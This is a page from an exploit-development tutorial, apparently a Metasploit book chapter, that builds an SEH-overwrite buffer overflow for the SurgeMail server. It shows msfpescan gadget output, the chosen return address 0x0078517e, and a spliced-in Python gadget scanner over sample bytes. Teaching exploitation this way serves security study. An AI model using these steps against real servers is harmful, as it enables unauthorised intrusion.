206

Chapter 14

   Platform: Windows
       Arch: x86
Needs Admin: No
 Total size: 341
       Rank: Normal

The return address at   in the 'Targets' section is currently occupied by a placeholder value, which we’ll change later in the exploit development process.

As with the fuzzer module discussed earlier, this exploit connects and logs into the target at  , uses a string of As at   as the initial buffer, and appends four Cs at   to overwrite the SEH. The entire exploit string is generated at   and then sent to the target at  .

Getting a Return Address

The next step is to locate a POP-POP-RETN sequence in surgemail.exe. To do so, copy the executable to a location on your Back|Track machine, and then use the -p switch with msfpescan to locate a suitable candidate, as in the following example:

root@bt:/tmp# msfpescan -p surgemail.exe

[surgemail.exe]
0x0042e947 pop esi; pop ebp; ret
0x0042f88b pop esi; pop ebp; ret
0x00458e68 pop esi; pop ebp; ret
0x00458edb pop esi; pop ebp; ret
0x0046754d pop esi; pop ebp; ret
0x00467578 pop esi; pop ebp; ret
0x0046d204 pop eax; pop ebp; ret

. . . SNIP . . .

0x0078506e pop ebx; pop ebp; ret
0x00785105 pop ecx; pop ebx; ret
0x0078517e pop esi; pop ebx; ret
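To show what msfpescan is actually matching in the listing above, here is an added example (not from the book or from Metasploit) that scans a small constructed byte buffer for the POP r32; POP r32; RET opcode patterns and prints them in the same address/disassembly layout. The image base 0x00400000 and the sample bytes are assumptions made for the example; in practice the bytes would come from the executable's code section.

```python
"""Added example: minimal POP-POP-RET scanner over constructed bytes (not surgemail.exe)."""

# x86 one-byte opcodes 0x58..0x5F encode POP r32 in this register order.
POP_REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
RET = 0xC3        # near return
RET_IMM16 = 0xC2  # near return that also pops an imm16 number of bytes (RET n)

IMAGE_BASE = 0x00400000  # assumed base address of the first byte in SAMPLE_CODE

# Constructed code bytes: three gadgets plus filler and near misses.
SAMPLE_CODE = bytes([
    0x90, 0x90,                     # nop; nop
    0x5E, 0x5D, 0xC3,               # pop esi; pop ebp; ret      (offset 2)
    0x8B, 0xEC,                     # mov ebp, esp  (not a gadget)
    0x58, 0x5D, 0xC3,               # pop eax; pop ebp; ret      (offset 7)
    0x5E, 0x5B, 0xC2, 0x04, 0x00,   # pop esi; pop ebx; ret 4    (offset 10)
    0x5E, 0xC3,                     # pop esi; ret  (only one pop, not matched)
])


def find_pop_pop_ret(code: bytes, base: int) -> list[tuple[int, str]]:
    """Return (virtual address, disassembly) for each POP; POP; RET[n] in code."""
    hits = []
    for off in range(len(code) - 2):
        b0, b1, b2 = code[off], code[off + 1], code[off + 2]
        if not (0x58 <= b0 <= 0x5F and 0x58 <= b1 <= 0x5F):
            continue
        pops = f"pop {POP_REGS[b0 - 0x58]}; pop {POP_REGS[b1 - 0x58]}"
        if b2 == RET:
            hits.append((base + off, f"{pops}; ret"))
        elif b2 == RET_IMM16 and off + 4 < len(code):
            imm = int.from_bytes(code[off + 3:off + 5], "little")
            hits.append((base + off, f"{pops}; ret {imm:#x}"))
    return hits


def format_report(code: bytes, base: int) -> list[str]:
    """Render hits as '0xAAAAAAAA pop r; pop r; ret' lines, like msfpescan -p."""
    return [f"{addr:#010x} {text}" for addr, text in find_pop_pop_ret(code, base)]


if __name__ == "__main__":
    for line in format_report(SAMPLE_CODE, IMAGE_BASE):
        print(line)
```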

When msfpescan is run against the target executable, it reads through the machine code looking for assembly instructions that match the target (a POP-POP-RETN sequence in this case) and displays the memory address where these instructions occur. As you can see in the listing, multiple addresses are found. We’ll use the address at the end of the output, 0x0078517e, to overwrite SEH in the exploit. Having made our selection, we edit the 'Targets' section of the exploit module to include this address and edit the exploit section to include it as part of the buffer to be sent, as shown next.